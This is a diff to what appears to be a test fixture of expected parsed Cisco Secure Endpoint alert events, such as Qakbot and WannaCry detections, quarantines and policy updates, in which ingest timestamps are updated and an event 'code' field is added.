Detection\",\"event_type_id\":553648147,\"detection\":\"W32.GenericKD:Gen.20fu.1201\",\"detection_id\":\"6411456342573187074\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"11179468.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\11179468.exe\",\"identity\":{\"sha256\":\"0b965ca8afea0638749b71ec6ad53f94e8bd9f9b359f1cb2e707dbe52f5d3960\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6411456342573187000",
@@ -842,8 +852,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:42:26.818498827Z",
+                "ingested": "2021-09-30T00:15:43.965504002Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411456342573187000,\"timestamp\":1610627534,\"timestamp_nanoseconds\":558000000,\"date\":\"2021-01-14T12:32:14+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411456342573187073\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"AySxs.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\AySxs.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}",
+                "code": "553648147",
                 "kind": "alert",
                 "action": "Retrospective Detection",
                 "id": "6411456342573187000",
@@ -922,8 +933,9 @@
             },
             "event": {
                 "severity": 4,
-                "ingested": "2021-09-27T00:42:26.818500718Z",
+                "ingested": "2021-09-30T00:15:43.965506181Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1492784107692000800,\"timestamp\":1610627262,\"timestamp_nanoseconds\":692000000,\"date\":\"2021-01-14T12:27:42+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Critical\",\"start_timestamp\":1610627262,\"start_date\":\"2021-01-14T12:27:42+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Qakbot is a worm that spreads through network shares and removable drives. It downloads additional files, steals information, and opens a back door on the compromised computer. The worm also contains rootkit functionality to allow it to hide its presence. A command or file path similar to one used by Qakbot for spreading across the network or persistence was seen.\",\"short_description\":\"W32.Qakbot.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"cmd.exe\",\"file_path\":\"/C:/Windows/SysWOW64/cmd.exe\",\"identity\":{\"sha256\":\"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"8063af71d08d015cc102788491c6274d3d33290b8dc41f91cc511a36fa0cba75\"}}}}}",
+                "code": "1107296274",
                 "kind": "alert",
                 "start": "2021-01-14T12:27:42.000Z",
                 "action": "Cloud IOC",
@@ -1002,8 +1014,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:42:26.818502467Z",
+                "ingested": "2021-09-30T00:15:43.965508262Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1458626002840536600,\"timestamp\":1610627243,\"timestamp_nanoseconds\":268148295,\"date\":\"2021-01-14T12:27:23+00:00\",\"event_type\":\"Threat Detected in Low Prevalence Executable\",\"event_type_id\":1107296278,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\"}}}}",
+                "code": "1107296278",
                 "kind": "alert",
                 "action": "Threat Detected in Low Prevalence Executable",
                 "id": "1458626002840536600",
@@ -1065,11 +1078,12 @@
             },
             "event": {
                 "severity": 0,
-                "action": "Policy Update",
-                "ingested": "2021-09-27T00:42:26.818504268Z",
+                "ingested": "2021-09-30T00:15:43.965510322Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583861114428195000,\"timestamp\":1610626750,\"timestamp_nanoseconds\":161000000,\"date\":\"2021-01-14T12:19:10+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
-                "id": "6583861114428195000",
-                "kind": "alert"
+                "code": "553648130",
+                "kind": "alert",
+                "action": "Policy Update",
+                "id": "6583861114428195000"
             },
             "cisco": {
                 "secure_endpoint": {
@@ -1138,8 +1152,9 @@
             },
             "event": {
                 "severity": 0,
-                "ingested": "2021-09-27T00:42:26.818506022Z",
+                "ingested": "2021-09-30T00:15:43.965512361Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6264747552596296000,\"timestamp\":1610626264,\"timestamp_nanoseconds\":27000000,\"date\":\"2021-01-14T12:11:04+00:00\",\"event_type\":\"File Fetch Completed\",\"event_type_id\":553648173,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Low_Prev_Retro\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"df:d1:ed:2d:c8:fc\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"report.pdf.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\rsteadman\\\\Downloads\\\\report.pdf.exe\",\"identity\":{\"sha256\":\"d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b\",\"sha1\":\"5058b16a86beee96927371210b9a9f682976a50a\",\"md5\":\"48a0bf05b9706a00d2a0ff6260412f11\"}}}}",
+                "code": "553648173",
                 "kind": "alert",
                 "action": "File Fetch Completed",
                 "id": "6264747552596296000",
@@ -1234,8 +1249,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818507758Z",
+                "ingested": "2021-09-30T00:15:43.965514411Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411444887895409000,\"timestamp\":1610625778,\"timestamp_nanoseconds\":756000000,\"date\":\"2021-01-14T12:02:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Auto.A280012EEE.in10.tht.Talos\",\"detection_id\":\"6411444887895408641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_2\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d1:e2:b6:61:ef:7a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"X4.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\X4.exe\",\"identity\":{\"sha256\":\"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62\",\"sha1\":\"c235e18bae63d6c4b5daadb833686f943de65a5f\",\"md5\":\"a659ff79ef7ffacbd61d4c2641379e44\"},\"parent\":{\"process_id\":4744,\"disposition\":\"Clean\",\"file_name\":\"wscript.exe\",\"identity\":{\"sha256\":\"9c8a1b52a638ca87a5e7e60e635a3cbf89b04f5888995f55e2ad3d94ab009b97\",\"sha1\":\"2131cff0959d213cd9a5e8a8ac362d265d5b1316\",\"md5\":\"045451fa238a75305cc26ac982472367\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6411444887895409000",
@@ -1311,8 +1327,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818509604Z",
+                "ingested": "2021-09-30T00:15:43.965522568Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411444887895409000,\"timestamp\":1610625778,\"timestamp_nanoseconds\":772000000,\"date\":\"2021-01-14T12:02:58+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6411444887895408641\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_2\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d1:e2:b6:61:ef:7a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"a280012eeedb19a9b4a7ddfb3c4dca316ce96ad376d98092351529c4db052e62\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6411444887895409000",
@@ -1382,8 +1399,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818511367Z",
+                "ingested": "2021-09-30T00:15:43.965524780Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187549993959000,\"timestamp\":1610625537,\"timestamp_nanoseconds\":208000000,\"date\":\"2021-01-14T11:58:57+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419187549993959449\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "2164260880",
                 "kind": "alert",
                 "action": "Quarantine Failure",
                 "id": "6419187549993959000",
@@ -1478,8 +1496,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818513110Z",
+                "ingested": "2021-09-30T00:15:43.965526875Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187549993959000,\"timestamp\":1610625537,\"timestamp_nanoseconds\":193000000,\"date\":\"2021-01-14T11:58:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419187549993959449\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"process_id\":2980,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419187549993959000",
@@ -1580,8 +1599,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818514857Z",
+                "ingested": "2021-09-30T00:15:43.965528958Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187537109058000,\"timestamp\":1610625534,\"timestamp_nanoseconds\":853000000,\"date\":\"2021-01-14T11:58:54+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419187537109057560\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":2980,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}",
+                "code": "1090519054",
                 "kind": "alert",
                 "action": "Threat Detected",
                 "id": "6419187537109058000",
@@ -1657,8 +1677,9 @@
             },
             "event": {
                 "severity": 2,
-                "ingested": "2021-09-27T00:42:26.818516593Z",
+                "ingested": "2021-09-30T00:15:43.965531032Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419187537109058000,\"timestamp\":1610625534,\"timestamp_nanoseconds\":884000000,\"date\":\"2021-01-14T11:58:54+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419187537109057560\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "code": "553648143",
                 "kind": "alert",
                 "action": "Threat Quarantined",
                 "id": "6419187537109058000",
@@ -1720,11 +1741,12 @@
             },
             "event": {
                 "severity": 0,
-                "action": "Policy Update",
-                "ingested": "2021-09-27T00:42:26.818518318Z",
+                "ingested": "2021-09-30T00:15:43.965533117Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6583853374897127000,\"timestamp\":1610624948,\"timestamp_nanoseconds\":562000000,\"date\":\"2021-01-14T11:49:08+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_MAP_FriedEx\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"04:e6:4d:d5:7a:b5\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
-                "id": "6583853374897127000",
-                "kind": "alert"
+                "code": "553648130",
+                "kind": "alert",
+                "action": "Policy Update",
+                "id": "6583853374897127000"
             },
             "cisco": {
                 "secure_endpoint": {
@@ -1788,8 +1810,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:42:26.818520176Z",
+                "ingested": "2021-09-30T00:15:43.965535211Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945825043963,\"timestamp\":1610624472,\"timestamp_nanoseconds\":496121997,\"date\":\"2021-01-14T11:41:12+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610624472,\"start_date\":\"2021-01-14T11:41:12+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}",
+                "code": "1107296272",
                 "kind": "alert",
                 "start": "2021-01-14T11:41:12.000Z",
                 "action": "Executed malware",
@@ -1869,8 +1892,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:42:26.818522003Z",
+                "ingested": "2021-09-30T00:15:43.965537386Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945825043964,\"timestamp\":1610624472,\"timestamp_nanoseconds\":498576872,\"date\":\"2021-01-14T11:41:12+00:00\",\"event_type\":\"Multiple Infected Files\",\"event_type_id\":1107296258,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610624472,\"start_date\":\"2021-01-14T11:41:12+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"},\"parent\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}}",
+                "code": "1107296258",
                 "kind": "alert",
                 "start": "2021-01-14T11:41:12.000Z",
                 "action": "Multiple Infected Files",
@@ -1945,8 +1969,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:42:26.818523760Z",
+                "ingested": "2021-09-30T00:15:43.965539415Z",
                 "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533671599780921000,\"timestamp\":1610623726,\"timestamp_nanoseconds\":440000000,\"date\":\"2021-01-14T11:28:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6533671595485954049\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"fce5b6784dc9f44cdc1d6214bb7b68d3029db049dcaf734edc9660bb3373bc79\"}}}}",
+                "code": "553648155",
                 "kind": "alert",
                 "action": "Retrospective Quarantine",
                 "id": "6533671599780921000",
@@ -2026,8 +2051,9 @@
             },
             "event": {
                 "severity": 3,
-                "ingested": "2021-09-27T00:42:26.818525503Z",
+                "ingested": "2021-09-30T00:15:43.965541431Z",
